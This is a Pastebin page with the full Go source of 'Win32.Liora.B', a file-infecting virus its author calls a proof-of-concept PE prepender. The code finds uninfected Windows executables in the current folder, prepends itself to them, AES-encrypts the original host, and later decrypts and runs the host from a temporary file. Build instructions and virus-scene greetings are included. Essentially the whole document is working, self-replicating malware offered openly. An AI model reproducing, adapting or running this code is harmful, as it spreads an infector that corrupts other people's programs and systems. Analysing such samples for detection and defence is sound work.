API tools faq
paste
Advertisement
SH1NU11b1

GOPEPePender

SH1NU11b1
Dec 1st, 2015
134
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Go 6.75 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. * Win32.Liora.B - This is a POC PE prepender written in Go by TMZ (2015).
  3. *
  4. * Win32.Liora.B (May 2015) - Simple binary infector in GoLang (prepender).
  5. * This version encrypts the host code with AES and decrypts it at runtime.
  6. * It's almost a direct port from my GoLang ELF infector Linux.Liora, just a few tweaks.
  7. *
  8. * Compile with: go build -i liora_b.go (where go >= 1.4.2)
  9. * It has no external dependencies so it should compile under most systems (x86 and x86_64).
  10. *
  11. * Use at your own risk, I'm not responsible for any damages that this may cause.
  12. *
  13. * A big shout for those who keeps the scene alive: herm1t, alcopaul, SPTH, hh86, genetix, R3s1stanc3 and many others :)
  14. *
  15. * Feel free to email me: tmz@null.net || You can also find me at http://vxheaven.org/ and on Twitter @TMZvx
  16. *
  17. * http://vx.thomazi.me
  18. */
  19.  
  20. package main
  21.  
  22. import (
  23.     "bufio"
  24.     "io"
  25.     "io/ioutil"
  26.     "os"
  27.     "os/exec"
  28.     "strings"
  29.     "crypto/aes"
  30.        "crypto/cipher"
  31.     "math/rand"
  32.     "time"
  33.     "debug/pe"
  34.     "encoding/binary"
  35.  
  36. )
  37.  
  38. func check(e error) {
  39.     // Reading files requires checking most calls for errors.
  40.     // This helper will streamline our error checks below.
  41.     if e != nil {
  42.         panic(e)
  43.     }
  44. }
  45.  
  46. func _ioReader(file string) io.ReaderAt {
  47.     r, err := os.Open(file)
  48.     check(err)
  49.     return r
  50. }
  51.  
  52. func CheckPE(file string) bool {
  53.  
  54.     r := _ioReader(file) //reader interface for file
  55.     f, err := pe.NewFile(r) //open the file as a PE
  56.     if err != nil {
  57.         return false //Not a PE file
  58.     }
  59.  
  60.     //Reading DOS header
  61.     var dosheader [96]byte      
  62.     r.ReadAt(dosheader[0:], 0)
  63.     if dosheader[0] == 'M' && dosheader[1] == 'Z' { //if we get MZ
  64.         signoff := int64(binary.LittleEndian.Uint32(dosheader[0x3c:]))
  65.         var sign [4]byte
  66.         r.ReadAt(sign[:], signoff)
  67.         if !(sign[0] == 'P' && sign[1] == 'E' && sign[2] == 0 && sign[3] == 0) { //if not PE\0\0
  68.             return false //Invalid PE File Format
  69.         }
  70.     }  
  71.     if (f.Characteristics & 0x2000) == 0x2000 { //IMAGE_FILE_DLL signature
  72.         return false //it's a DLL, OCX, CPL file, we dont want that
  73.     }
  74.  
  75.     f.Close()
  76.     return true //all checks passed
  77.  
  78. }
  79.  
  80. func CheckInfected(file string) bool {
  81.  
  82.     _mark := "=TMZ=" //infection mark
  83.      fi, err := os.Open(file)
  84.     check(err)
  85.     myStat, err := fi.Stat()
  86.     check(err)    
  87.     size := myStat.Size()
  88.  
  89.     buf := make([]byte, size)
  90.     fi.Read(buf)
  91.     fi.Close()
  92.     var x int64
  93.     for x = 1; x < size; x++ {
  94.         if buf[x] == _mark[0] {
  95.             var y int64          
  96.             for y = 1; y < int64(len(_mark)); y++ {
  97.                 if (x + y) >= size {
  98.                         break
  99.                     }
  100.                     if buf[x + y] != _mark[y] {
  101.                             break
  102.                     }
  103.                 }
  104.                 if y == int64(len(_mark)) {
  105.                     return true; //infected!
  106.                 }
  107.             }
  108.         }
  109.     return false; //not infected
  110. }
  111.  
  112. func Infect(file string) {
  113.  
  114.     dat, err := ioutil.ReadFile(file) //read host
  115.     check(err)  
  116.     vir, err := os.Open(os.Args[0]) //read virus
  117.     check(err)
  118.     virbuf := make([]byte, 3039232)
  119.     vir.Read(virbuf)
  120.  
  121.     encDat := Encrypt(dat) //encrypt host
  122.  
  123.     f, err := os.OpenFile(file, os.O_RDWR, 0666) //open host
  124.     check(err)
  125.  
  126.       w := bufio.NewWriter(f)
  127.     w.Write(virbuf) //write virus
  128.     w.Write(encDat) //write encypted host
  129.     w.Flush() //make sure we are all set
  130.     f.Close()
  131.     vir.Close()
  132.  
  133. }
  134.  
  135. func RunHost() {
  136.  
  137.     hostbytes := Rnd(8) + ".exe" //generate random name
  138.  
  139.     h, err := os.Create(hostbytes) //create tmp with above name (same folder)
  140.     check(err)
  141.  
  142.     allSZ := GetSz(os.Args[0]) //get size of myself
  143.     //allSZ := len(infected_data) //get file full size
  144.     hostSZ := allSZ - 3039232 //calculate host size
  145.  
  146.     f, err := os.Open(os.Args[0]) //open host
  147.     check(err)
  148.  
  149.     f.Seek(3039232, os.SEEK_SET) //go to host start
  150.  
  151.     hostBuf := make([]byte, hostSZ)
  152.     f.Read(hostBuf) //read it until hostBuf size
  153.  
  154.     plainHost := Decrypt(hostBuf) //decrypt host
  155.  
  156.     w := bufio.NewWriter(h)
  157.     w.Write(plainHost) //write plain host to tmp file
  158.     w.Flush() //make sure we are all set
  159.     h.Close()
  160.     f.Close()
  161.  
  162.     os.Chmod(hostbytes, 0755) //give it proper permissions
  163.  
  164.     if len(os.Args) > 1 {
  165.         cmd := exec.Command(hostbytes, os.Args[1]) //create the command
  166.         cmd.Start() //execute it
  167.         err = cmd.Wait() //wait process to finish
  168.     } else {
  169.         cmd := exec.Command(hostbytes) //create the command w/o args
  170.         cmd.Start() //execute it
  171.         err = cmd.Wait() //wait process to finish
  172.     }
  173.     os.Remove(hostbytes) //delete tmp file
  174. }
  175.  
  176. func Encrypt(toEnc []byte) []byte {
  177.  
  178.     key := "SUPER_SECRET_KEY" // 16 bytes!
  179.     block,err := aes.NewCipher([]byte(key))
  180.     check(err)
  181.  
  182.     // 16 bytes for AES-128, 24 bytes for AES-192, 32 bytes for AES-256
  183.     ciphertext := []byte("ASUPER_SECRET_IV")
  184.     iv := ciphertext[:aes.BlockSize] // const BlockSize = 16
  185.  
  186.     encrypter := cipher.NewCFBEncrypter(block, iv)
  187.  
  188.     encrypted := make([]byte, len(toEnc))
  189.     encrypter.XORKeyStream(encrypted, toEnc)
  190.  
  191.     //fmt.Printf("%s encrypted to %v\n", toEnc, encrypted)
  192.     return encrypted
  193.  
  194. }
  195.  
  196. func Decrypt(toDec []byte) []byte {
  197.  
  198.     key := "SUPER_SECRET_KEY" // 16 bytes
  199.     block,err := aes.NewCipher([]byte(key))
  200.     check(err)
  201.  
  202.     // 16 bytes for AES-128, 24 bytes for AES-192, 32 bytes for AES-256
  203.     ciphertext := []byte("ASUPER_SECRET_IV")
  204.     iv := ciphertext[:aes.BlockSize] // const BlockSize = 16
  205.  
  206.     decrypter := cipher.NewCFBDecrypter(block, iv) // simple
  207.  
  208.     decrypted := make([]byte, len(toDec))
  209.     decrypter.XORKeyStream(decrypted, toDec)
  210.  
  211.     return decrypted
  212. }
  213.  
  214. func Rnd(n int) string {
  215.  
  216.     rand.Seed(time.Now().UTC().UnixNano())
  217.     var letters = []rune("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")
  218.     b := make([]rune, n)
  219.     for i := range b {
  220.         b[i] = letters[rand.Intn(len(letters))]
  221.     }
  222.     return string(b)
  223.  
  224. }
  225.  
  226. func GetSz(file string) int64 {
  227.  
  228.     myHnd, err := os.Open(file)
  229.     check(err)
  230.     defer myHnd.Close()
  231.     myStat, err := myHnd.Stat()
  232.     check(err)
  233.     mySZ := myStat.Size()
  234.     myHnd.Close()
  235.     return mySZ
  236. }
  237.  
  238. func main() {
  239.  
  240.     virPath := os.Args[0]
  241.  
  242.     files, _ := ioutil.ReadDir(".")
  243.     for _, f := range files {
  244.         if CheckPE(f.Name()) == true {
  245.             if CheckInfected(f.Name()) == false {
  246.                 if !strings.Contains(virPath, f.Name()) {
  247.                     Infect(f.Name())
  248.                 }  
  249.             }  
  250.         }
  251.     }
  252.  
  253.     if GetSz(os.Args[0]) > 3039232 {
  254.         RunHost()
  255.     } else {
  256.         os.Exit(0)
  257.     }
  258. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!